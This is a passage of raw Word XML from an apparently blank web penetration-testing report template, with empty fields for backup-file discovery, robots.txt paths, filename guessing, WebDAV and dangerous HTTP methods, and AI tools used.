          <w:trHeight w:val="1925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CB73E46" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="0046647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15588E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDCAB10" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276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33276" w:rsidRPr="001749A3" w14:paraId="796E0835" w14:textId="77777777" w:rsidTr="0046647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1CC164E" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="0046647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749A3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7D808E17" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="00533276">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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7D80DCD" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="00533276">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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6965EA5" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="00533276">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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1B9AC5F" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="00533276">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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B16767B" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="00533276">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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7CC087A" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="0053327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94BBB" w:rsidRPr="001749A3" w14:paraId="01CEF5E0" w14:textId="77777777" w:rsidTr="0046647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6C58512" w14:textId="74894472" w:rsidR="00F94BBB" w:rsidRPr="001749A3" w:rsidRDefault="00F94BBB" w:rsidP="0046647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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5113AFEA" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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C030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[*ShellGPT, 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Microsoft Copilot, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B50906D" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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28EF80D" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRPr="001749A3" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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94BBB" w:rsidRPr="001749A3" w14:paraId="6F734419" w14:textId="77777777" w:rsidTr="00EE3C19">
        <w:trPr>
          <w:trHeight w:val="1502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8DFAADE" w14:textId="3408777B" w:rsidR="00F94BBB" w:rsidRPr="00BA7B6B" w:rsidRDefault="00F94BBB" w:rsidP="0046647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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DC8206" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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D74FFEF" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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7AAD326" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRPr="002C030C" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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94BBB" w:rsidRPr="001749A3" w14:paraId="79840D84" w14:textId="77777777" w:rsidTr="0046647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F78A595" w14:textId="5A07862D" w:rsidR="00F94BBB" w:rsidRPr="004B6A7F" w:rsidRDefault="00F94BBB" w:rsidP="0046647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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB344B0" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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15EF3B3" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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2B7D2E7" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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1229639" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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2754FD2" w14:textId="77777777" w:rsidR="00F94BBB" w:rsidRDefault="00F94BBB" w:rsidP="00F94BB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</w:tbl>
    <w:p w14:paraId="7D36D5BD" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRPr="00A51A96" w:rsidRDefault="00EA0541" w:rsidP="00EA0541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lastRenderedPageBreak/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0541" w14:paraId="0DF7F87B" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB29C1C" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E1BC01A" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19A58ECC" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F63EA6B" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3725018F" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21B99A00" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6855BDAD" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C5A8138" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="771C2658" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRDefault="00EA0541" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A69FC9A" w14:textId="77777777" w:rsidR="00AC6800" w:rsidRDefault="00AC6800" w:rsidP="000947B4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8803C1" w:rsidRPr="00A51A96" w14:paraId="187BDC0D" w14:textId="77777777" w:rsidTr="00CF0903">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2F743757" w14:textId="17C28E51" w:rsidR="008803C1" w:rsidRPr="003C713F" w:rsidRDefault="008803C1" w:rsidP="0085194C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3.3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7E5C4D" w:rsidRPr="007E5C4D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Backup and Unreferenced Files for Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="786E2419" w14:textId="77777777" w:rsidR="00EA0541" w:rsidRPr="006B0AB2" w:rsidRDefault="00EA0541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E122AB" w:rsidRPr="001749A3" w14:paraId="50AF080F" w14:textId="77777777" w:rsidTr="000F3ED1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08B5087" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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749A3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7B9CFD51" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3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122AB" w:rsidRPr="001749A3" w14:paraId="2D55D98A" w14:textId="77777777" w:rsidTr="000F3ED1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5D50196" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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749A3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37AAC50A" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3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122AB" w:rsidRPr="001749A3" w14:paraId="5C658A23" w14:textId="77777777" w:rsidTr="000F3ED1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18752DB" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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749A3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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F827F96" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3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122AB" w:rsidRPr="001749A3" w14:paraId="0B37E623" w14:textId="77777777" w:rsidTr="000F3ED1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E714917" w14:textId="01073DEE" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00084A07" w:rsidP="000F3ED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84A07">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Enumerated Pages &amp; Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0DD22C" w14:textId="43D6204D" w:rsidR="00E122AB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425FE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084A07" w:rsidRPr="00084A0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Manually or via Spidering Tools</w:t>
            </w:r>
            <w:r w:rsidRPr="00425FE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C449B27" w14:textId="77777777" w:rsidR="00E122AB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F0117B5" w14:textId="77777777" w:rsidR="00E122AB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7F7745E" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="00425FE4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E122AB" w:rsidRPr="001749A3" w14:paraId="18AC7DA1" w14:textId="77777777" w:rsidTr="000F3ED1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A8471BA" w14:textId="3CD220FF" w:rsidR="00E122AB" w:rsidRPr="00425FE4" w:rsidRDefault="00D3487D" w:rsidP="000F3ED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3487D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Hidden URLs Found in HTML/JavaScript Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="460BE26F" w14:textId="77777777" w:rsidR="00E122AB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C4493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Examples if found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0FA8B86" w14:textId="77777777" w:rsidR="00E122AB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6C76D4B" w14:textId="77777777" w:rsidR="00E122AB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BB8B961" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="00425FE4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E122AB" w:rsidRPr="001749A3" w14:paraId="794B95B6" w14:textId="77777777" w:rsidTr="000F3ED1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C5C5697" w14:textId="750E8139" w:rsidR="00E122AB" w:rsidRPr="00C44937" w:rsidRDefault="00AA681D" w:rsidP="000F3ED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A681D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Disallowed Paths in robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D72B52C" w14:textId="535442F9" w:rsidR="00E122AB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AA681D" w:rsidRPr="00AA681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List of Identified Paths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49D3C6A" w14:textId="77777777" w:rsidR="00E122AB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F2389D8" w14:textId="77777777" w:rsidR="00E122AB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16C0D6C" w14:textId="77777777" w:rsidR="00E122AB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E122AB" w:rsidRPr="001749A3" w14:paraId="770CBF66" w14:textId="77777777" w:rsidTr="000F3ED1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3BB7122" w14:textId="0B2AD844" w:rsidR="00E122AB" w:rsidRPr="00A376F7" w:rsidRDefault="00AA681D" w:rsidP="000F3ED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A681D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Wordlist-Based Filename Guessing Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28F015AC" w14:textId="0A70B716" w:rsidR="00E122AB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6709E2" w:rsidRPr="006709E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Successful Requests if found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D7C25AD" w14:textId="77777777" w:rsidR="00E122AB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EBE2E8C" w14:textId="77777777" w:rsidR="00E122AB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10C7C64" w14:textId="77777777" w:rsidR="00E122AB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E122AB" w:rsidRPr="001749A3" w14:paraId="7BDA46A0" w14:textId="77777777" w:rsidTr="000F3ED1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F17994D" w14:textId="681A4354" w:rsidR="00E122AB" w:rsidRPr="00201326" w:rsidRDefault="006709E2" w:rsidP="000F3ED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709E2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Public Source Enumeration Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0760F285" w14:textId="2DE9D79C" w:rsidR="00E122AB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4D29AF" w:rsidRPr="004D29A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Google Cache, Indexed Hidden Files,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D44A019" w14:textId="77777777" w:rsidR="00E122AB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4FD987B" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRDefault="00E670E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CBEB95F" w14:textId="77777777" w:rsidR="00E122AB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E122AB" w:rsidRPr="001749A3" w14:paraId="4FB82787" w14:textId="77777777" w:rsidTr="000F3ED1">
        <w:trPr>
          <w:trHeight w:val="152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FD47583" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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15588E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14AD1981" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3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122AB" w:rsidRPr="001749A3" w14:paraId="172FB4A6" w14:textId="77777777" w:rsidTr="000F3ED1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6D152B0" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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749A3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075E1251" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="00E122AB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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EF161E0" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="00E122AB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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D44ADE8" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="00E122AB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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ED08DD2" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="00E122AB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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1DDAAC0" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="00E122AB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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FEC4C16" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3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122AB" w:rsidRPr="001749A3" w14:paraId="674519F1" w14:textId="77777777" w:rsidTr="000F3ED1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C3207D1" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4662A9A7" w14:textId="77777777" w:rsidR="00E122AB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C030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[*ShellGPT, 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Microsoft Copilot, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52134582" w14:textId="77777777" w:rsidR="00E122AB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85E5DE6" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="001749A3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122AB" w:rsidRPr="001749A3" w14:paraId="1AF7FF13" w14:textId="77777777" w:rsidTr="000F3ED1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1012723" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="00BA7B6B" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04475BD6" w14:textId="77777777" w:rsidR="00E122AB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09AC65B" w14:textId="77777777" w:rsidR="00E122AB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CB871F2" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="002C030C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E122AB" w:rsidRPr="001749A3" w14:paraId="7E4A7011" w14:textId="77777777" w:rsidTr="000F3ED1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7012B2F" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRPr="004B6A7F" w:rsidRDefault="00E122AB" w:rsidP="000F3ED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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E27527" w14:textId="77777777" w:rsidR="00E122AB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4B53329" w14:textId="77777777" w:rsidR="00E122AB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6786524" w14:textId="77777777" w:rsidR="00E122AB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3CCE73A" w14:textId="77777777" w:rsidR="00E122AB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6CF6B0C" w14:textId="77777777" w:rsidR="00E122AB" w:rsidRDefault="00E122AB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</w:tbl>
    <w:p w14:paraId="6350C065" w14:textId="77777777" w:rsidR="007E5C4D" w:rsidRDefault="007E5C4D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A453B9" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRPr="00A51A96" w:rsidRDefault="00E670E6" w:rsidP="00E670E6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670E6" w14:paraId="10429E81" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38552CE8" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRDefault="00E670E6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36A88F42" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRDefault="00E670E6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B8C9BAF" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRDefault="00E670E6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C3D7811" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRDefault="00E670E6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D3408CE" w14:textId="77777777" w:rsidR="00E670E6" w:rsidRDefault="00E670E6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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E172D7" w:rsidRPr="00A51A96" w14:paraId="3C386C98" w14:textId="77777777" w:rsidTr="00947955">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6AEDB4A7" w14:textId="02E5707D" w:rsidR="00E172D7" w:rsidRPr="003C713F" w:rsidRDefault="00E172D7" w:rsidP="0085194C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3.4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B4313C" w:rsidRPr="00B4313C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Dangerous HTTP Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4569123E" w14:textId="77777777" w:rsidR="00E172D7" w:rsidRPr="00A303ED" w:rsidRDefault="00E172D7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3150"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A02B04" w:rsidRPr="00A02B04" w14:paraId="6C26CF7A" w14:textId="77777777" w:rsidTr="00805D3C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66CD35C0" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04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6993F4E4" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B0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02B04" w:rsidRPr="00A02B04" w14:paraId="5C0F67F9" w14:textId="77777777" w:rsidTr="00805D3C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27F276CE" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04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1BC47D80" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B0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02B04" w:rsidRPr="00A02B04" w14:paraId="157840F5" w14:textId="77777777" w:rsidTr="00805D3C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56149871" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04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6F2910D9" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B0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02B04" w:rsidRPr="00A02B04" w14:paraId="764FDC3D" w14:textId="77777777" w:rsidTr="00805D3C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4160AEAD" w14:textId="230F94B3" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04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List of HTTP Request</w:t>
            </w:r>
            <w:r w:rsidRPr="00A02B04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or Dangerous </w:t>
            </w:r>
            <w:r w:rsidR="00805D3C" w:rsidRPr="00A02B04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HTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00A02B04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 Methods that Can Be Exploited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3519FB1D" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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0C36053" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46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253335C" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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CE616C7" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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204BFA3" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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B38A70F" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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76DB1EE" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B0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A409D" w:rsidRPr="00A02B04" w14:paraId="136FF2D8" w14:textId="77777777" w:rsidTr="00805D3C">
        <w:trPr>
          <w:trHeight w:val="1808"/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7D6D7B76" w14:textId="6BFC1A71" w:rsidR="00EA409D" w:rsidRPr="00A02B04" w:rsidRDefault="00EA409D" w:rsidP="00805D3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Technique</w:t>
            </w:r>
            <w:r w:rsidR="00884682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 Used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326DC4FD" w14:textId="77777777" w:rsidR="00EA409D" w:rsidRDefault="00EA409D" w:rsidP="00EA409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0981324" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="00EA409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166CF0C" w14:textId="77777777" w:rsidR="00884682" w:rsidRDefault="00884682" w:rsidP="00EA409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C26469D" w14:textId="77777777" w:rsidR="00884682" w:rsidRPr="00A02B04" w:rsidRDefault="00884682" w:rsidP="00EA409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02B04" w:rsidRPr="00A02B04" w14:paraId="2491DD4F" w14:textId="77777777" w:rsidTr="00805D3C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70C0F5C3" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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A02B04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Enabled Web-based Distributed Authoring and Versioning (WebDAV) Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315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5A11F5E" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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A02B04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37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13D37C9" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00A02B04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A02B04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A02B04" w:rsidRPr="00A02B04" w14:paraId="3ECF1B79" w14:textId="77777777" w:rsidTr="00805D3C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AE3D787" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Enabled Web‐based Distributed Authoring and Versioning (WebDAV)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61CFFB05" w14:textId="77777777" w:rsidR="00A02B04" w:rsidRPr="00A02B04" w:rsidRDefault="00A02B04" w:rsidP="00805D3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02B04">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
